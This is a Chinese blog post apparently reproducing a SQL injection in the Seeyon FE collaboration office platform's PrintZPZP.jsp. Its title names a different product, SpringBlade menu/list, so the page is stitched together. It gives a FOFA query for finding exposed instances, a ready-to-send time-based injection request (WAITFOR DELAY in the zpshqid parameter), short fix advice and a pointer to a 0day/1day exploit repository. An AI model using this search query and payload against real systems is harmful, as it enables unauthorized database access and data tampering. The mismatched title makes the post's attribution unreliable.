当前位置: 首页 > article >正文

【漏洞复现】SpringBlade menu/list SQL注入漏洞


》》》产品描述《《《

        致远互联智能协同是一个信息窗口与工作界面,进行所有信息的分类组合和聚合推送呈现。通过面向角色化、业务化、多终端的多维信息空间设计,为不同组织提供协同门户,打破组织内信息壁垒,构建统一协同沟通的平台。


》》》漏洞描述《《《

        致远互联 FE协作办公平台 PrintZPzP,jsp 存在一个 SQL 注入Q漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性,


》》》搜索语句《《《

title="FE协作办公平台" || body="li_plugins_download"


》》》漏洞复现《《《

POC

GET /kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'--  HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive



》》》修复建议《《《

1、如非必要,禁止公网访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------


http://www.kler.cn/a/349789.html

相关文章:

  • Golang笔记——常用库context和runtime
  • STM32标准库移植RT-Thread nano
  • 51单片机开发:独立键盘实验
  • 大数据治理实战:架构、方法与最佳实践
  • 项目部署(springboot项目)
  • mamba论文学习
  • 将图片转换为视频
  • 【Linux】Linux进程概念
  • 域2:资产安全 第5章-保护资产安全
  • 在阿里云Milvus中管理Databases
  • 展示图片--系统篇
  • [论文笔记] llama3.2 蒸馏
  • Encoder-Decoder 编码器-解码器架构 (Seq2Seq Model)
  • 【前端】如何制作一个简单的网页(3)
  • 【数据结构】1.顺序表
  • WPF实现类似网易云音乐的菜单切换
  • 用于病理图像诊断的跨尺度多实例学习|文献速递-基于深度学习的医学影像分类,分割与多模态应用
  • 通过Express + Vue3从零构建一个用户认证与授权系统(三)前端应用工程构建
  • 无人机之轨迹跟踪篇
  • Qt-系统QThread多线程介绍使用(62)
  • 通过阿里云【Milvus】快速实现向量检索
  • springboot中按日期生成当天唯一编码
  • 猫头虎 分享:Python库 aiohttp 的简介、安装、用法详解入门教程
  • 98. UE5 GAS RPG 实现技能眩晕效果
  • 转行AI产品经理:高薪诱惑,年薪90万不是梦!
  • 一文了解:LLM Dropout